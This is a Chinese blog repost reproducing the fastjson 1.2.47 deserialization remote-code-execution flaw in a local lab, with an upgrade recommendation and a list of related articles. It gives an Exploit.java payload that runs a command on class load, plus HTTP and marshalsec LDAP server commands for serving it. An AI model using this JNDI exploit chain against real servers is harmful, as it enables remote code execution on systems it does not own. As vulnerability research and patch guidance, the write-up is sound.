fastjson =< 1.2.47 反序列化漏洞复现

最新推荐文章于 2025-05-29 19:35:09 发布
最新推荐文章于 2025-05-29 19:35:09 发布
阅读量806 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: 运维 测试 ldap
原文链接:http://www.cnblogs.com/zhengjim/p/11433926.html
博客详细介绍了FastJSON 1.2.47版本中无需开启autoType即可利用的反序列化漏洞,通过在win10环境下使用特定配置的Java和fastjson库,配合marshalsec工具,成功复现了该漏洞,并提供了修复建议。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

fastjson =< 1.2.47 反序列化漏洞复现

HW期间爆出来一个在hw期间使用的fastjson 漏洞,该漏洞无需开启autoType即可利用成功,建议使用fastjson的用户尽快升级到> 1.2.47版本(保险起见,建议升级到最新版)

复现详情

环境

  • win10
  • fastjson 1.2.47
  • jdk 1.8.1
  • marshalsec

环境过程

首先先创建maven项目,下载fastjson版本为1.2.47

<dependencies>
        <dependency>
            <groupId>com.alibaba</groupId>
            <artifactId>fastjson</artifactId>
            <version>1.2.47</version>
        </dependency>
</dependencies>

创建一个Exploit.java文件,Java 编译一下生成 Exploit.class 文件

exploit.java内容

public class Exploit {

        static {
                System.err.println("Pwned");
                try {
                        String[] cmd = {"calc"};
                        java.lang.Runtime.getRuntime().exec(cmd).waitFor();
                } catch ( Exception e ) {
                        e.printStackTrace();
                }
        }
}

然后启动http服务,这边利用python的SimpleHTTPServer来启动。

python2 -m SimpleHTTPServer

983170-20190830111041693-1752323038.png

再利用marshalsec转发,创建一个ldap服务器

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8000/#Exploit"

983170-20190830111111159-1597654907.png

最后编写了一个测试用例

983170-20190830111127459-753073477.png

运行即可触发漏洞。

983170-20190830111141518-1850631252.png

983170-20190830111155598-1805794626.png

修复意见

尽快将fastjson升级至1.2.48及以上的版本。

转载于:https://www.cnblogs.com/zhengjim/p/11433926.html

Fastjson= 1.2.47 反序列化漏洞复现
qq_32660043的博客
08-23 540
0x01 前言 Fastjson 是一个 Java 语言编写的高性能功能完善的 JSON 库,可以将 Java 对象转换为 JSON 格式,也可以将 JSON 字符串转换为 Java 对象,在中国和美国使用较为广泛。 0x02 漏洞成因 Fastjson < 1.2.68 版本在处理反序列化对象时存在安全问题,导致攻击者可以执行 java 代码,具体分析可参考:FastJson 反序列化学习 0x03 环境准备 docker 搜索 Fastjson 漏洞利用镜像: docker search fas
【网络安全】Fastjson反序列化漏洞复现
kali_Ma的博客
12-26 2916
Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。
Fastjson反序列化漏洞原理与防护指南
最新发布
2302_81945070的博客
05-29 1645
Fastjson漏洞 = 快递员太老实 + 说明书有毒只要升级版本、关闭危险功能,就能像拒绝陌生快递一样保护服务器安全。
fastjson反序列化漏洞复现
weixin_58954236的博客
09-11 1505
FastJson是Alibaba的一款开源Json解析库,可用于将Java对象转换为其Json表示形式,也可以用于将Json字符串转换为等效的Java对象。近几年来FastJson漏洞层出不穷。RCE漏洞的源头:17年FastJson爆出的1.2.24反序列化漏洞。​ 关于FastJson1.2.24反序列化漏洞,简单来说,就是FastJson通过parseObject/parse将传入的字符串反序列化为Java对象时由于没有进行合理检查而导致的。
Fastjson反序列化漏洞复现
weixin_52501704的博客
01-02 2364
Fastjson反序列化漏洞复现
FastJson反序列化漏洞复现
小赵同学的博客
07-29 4183
漏洞利用FastJson autotype处理Json对象的时候,未对@type字段进行完整的安全性验证,攻击者可以传入危险类,并调用危险类连接远程RMI主机,通过其中的恶意类执行代码。攻击者通过这种方式可以实现远程代码执行漏洞,获取服务器敏感信息,甚至可以利用此漏洞进一步的对服务器数据进行操作。......
Fastjson 1.2.47反序列化漏洞复现
m0_54899775的博客
03-16 3578
Fastjson 1.2.47反序列化漏洞复现
fastjson=1.2.47反序列化漏洞复现
DaWan
09-29 497
fastjson<=1.2.47反序列化漏洞复现环境搭建漏洞复现 环境搭建 漏洞复现 创建一个java类: TouchFile.java // javac TouchFile.java import java.lang.Runtime; import java.lang.Process; public class TouchFile { static { try { Runtime rt = Runtime.getRuntime();
fastjson_1.2.47 反序列化漏洞复现
acdcccc的博客
09-19 362
fastjson 1.2.47 反序列化漏洞复现
Fastjson=1.2.47反序列化漏洞复现
m0_48520508的博客
07-28 1013
0x01简介 fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。 FastJson特点如下: (1)能够支持将java bean序列化成JSON字符串,也能够将JSON字符串反序列化成Java bean。 (2)顾名思义,FastJson操作JSON的速度是非常快的。 (3)无其他包的依赖。 (4)使用比较方便。 0x02漏洞介绍 Fastjson提供了aut
fastjson反序列化漏洞复现
THZLYXX的博客
11-25 455
fastjson在解析json(反序列化)的过程中,支持使用@Type来实例化一个具体类,且自动调用这个类的set/get方法来访问属性。服务器的fastjson在处理json数据的过程中,没有对@type进行校验,攻击者就可以传入危险类,并且调用危险的类远程连接ldap/rmi服务,通过ldap/rmi服务上的恶意代码执行远程命令。6.使用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar工具开启JNDI服务(注意需要使用jdk1.8环境)4.可使用burp进行编码。
Fastjson 1.2.47 反序列化(CVE-2017-18349)漏洞复现
HEAVEN569的博客
06-21 1870
Fastjson 1.2.47 反序列化(CVE-2017-18349)漏洞复现
Fastjson 1.2.24 反序列化漏洞复现
huangyongkang666的博客
04-15 3850
fastjson 1.2.24 反序列化漏洞复现 1.漏洞介绍 FastjsonEngine是其中的一个JSON处理引擎。Fastjson是其中的一个基于Java的JSON解析器/生成器。 Pippo 1.11.0版本中的FastjsonEngine所使用的Fastjson 1.2.25之前版本的parseObject存在安全漏洞。利用fastjson autotype在处理json对象时,未对@type字段进行安全的安全性验证,攻击者可以传入危险类,并调用危险类连接远程RMI主机,通过其中的恶意类执行代码
漏洞复现Fastjson反序列化
网络安全知识分享
12-31 6107
Fastjson反序列化一、简介二、序列化与反序列化三、Fastjson漏洞介绍1漏洞原理2、RMI3、JNDI4、JEP290四、编写的简单测试的环境五、漏洞版本1fastjson<=1.2.241.1、TemplatesImpl 利用链分析1.2、JNDI利用链分析1.3、JNDI利用1.4、官方进行的修复2fastjson<=1.2.413、fastjson<=1.2.424、fastjson<=1.2.455、fastjson<=1.2.476、1.2.48&lt
复现fastjson反序化漏洞(fastjson1.2.80)
TVT111的博客
07-21 4522
文章利用JNDI-Injection-Exploit工具,主要讲解如何利用JNDI注入复现fastjson反序化漏洞
fastjson反序列化漏洞复现过程
04-19
根据提供的引用内容,fastjson反序列化漏洞是一种安全漏洞,攻击者可以利用该漏洞在目标系统上执行恶意代码。下面是fastjson反序列化漏洞复现过程[^1][^2]: 1. 判断是否使用Fastjson以及Fastjson版本:首先需要确定目标系统是否使用了Fastjson,并且确定Fastjson的版本号。可以通过查看项目的依赖文件或者代码中的导入语句来确定。 2. 漏洞复现:根据Fastjson的版本号选择相应的漏洞复现方法。 - Fastjson<1.2.24远程代码执行(CNVD-2017-02833):该漏洞可以通过构造恶意的JSON字符串来触发远程代码执行。攻击者可以在JSON字符串中插入恶意的Java代码,并通过反序列化操作执行该代码。 - Fastjson<=1.2.47远程代码执行漏洞(CNVD-2019-22238):该漏洞可以通过构造恶意的JSON字符串来触发远程代码执行。攻击者可以在JSON字符串中使用特殊的反射调用方式来执行恶意代码。 3. 防范措施:为了防止fastjson反序列化漏洞的利用,可以采取以下措施: - 及时升级Fastjson版本:Fastjson团队会及时修复漏洞并发布新版本,及时升级到最新版本可以避免被已知漏洞攻击。 - 输入验证和过滤:在接收用户输入并进行反序列化操作之前,对输入进行严格的验证和过滤,确保输入的数据符合预期的格式和内容。 - 使用安全的JSON库:考虑使用其他安全性更高的JSON库,如Jackson或Gson,来替代Fastjson
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值